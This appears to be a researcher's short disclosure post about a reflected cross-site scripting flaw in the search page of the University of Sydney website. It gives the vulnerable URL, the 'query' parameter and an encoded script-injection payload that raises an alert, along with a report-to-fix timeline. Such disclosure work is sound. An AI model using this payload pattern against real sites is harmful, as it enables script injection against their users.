The University of Sydney - Cross-Site Scripting Vulnerability

 

The University of Sydney - Cross-Site Scripting Vulnerability

Vulnerability :  Cross-Site Scripting (XSS) - Reflected

Domain : https://www.sydney.edu.au

Vulnerable URL : https://www.sydney.edu.au/s/search.html?collection=Usyd-Library-External&num_ranks=10&fp_tiers=off&tiers=off&query=

Vulnerable Parameter : query

XSS Payload : %22%3E%3Cscript%3Ealert(%22XSS%20By%20Nayanjyoti%20Roy%22);%3C/script%3E

Timeline :
Apr 20,2021 - Report Sent
Aug 08,2021 - Vulnerability Fixed

Environment :
OS : Windows 10 Home
Browser : Firefox
Version : 88.0 ( 64-bit )

Researcher Name : Nayanjyoti Roy

Proof-Of-Concept video :

0 Comments